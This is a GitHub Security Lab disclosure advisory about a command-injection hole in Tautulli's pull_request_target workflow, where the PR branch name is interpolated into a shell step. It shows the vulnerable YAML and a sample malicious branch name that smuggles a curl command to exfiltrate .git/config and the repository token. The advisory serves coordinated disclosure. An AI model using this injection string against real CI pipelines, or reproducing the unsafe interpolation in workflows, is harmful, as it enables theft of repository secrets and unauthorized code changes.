skip to content
Back to
Home Bounties Research Advisories Get Involved Events
February 24, 2021

GHSL-2021-016: Unauthorized repository modification or secrets exfiltration in a GitHub workflow of Tautulli

Jaroslav Lobacevski

Coordinated Disclosure Timeline


The pull-requests.yml GitHub workflow is vulnerable to unauthorized modification of the base repository or secrets exfiltration from a Pull Request.


Tautulli/Tautulli repository

Tested Version

The latest changeset of pull-requests.yml to the date.


Issue: A branch name from the pull request is used to format a shell command

Please notice that the vulnerability exists in multiple branches as pull_request_target workflow runs from the branch the pull request was done to.

    types: [opened, synchronize, edited, reopened]
      - name: Fail Workflow
        if: github.base_ref != 'nightly'
        run: |
          echo Base: ${{ github.base_ref }}
          echo Head: ${{ github.head_ref }}
          exit 1


This vulnerability allows for arbitrary command injection into the bash script which allows for unauthorized modification of the base repository and secrets exfiltration. For example a PR from branch named a;${IFS}curl${IFS}-d${IFS}@.git/config${IFS}${IFS}# would exfiltrate the repository token to the attacker controlled server.


This issue was discovered and reported by GHSL team member @JarLob (Jaroslav Lobačevski).


You can contact the GHSL team at, please include a reference to GHSL-2021-016 in any communication regarding this issue.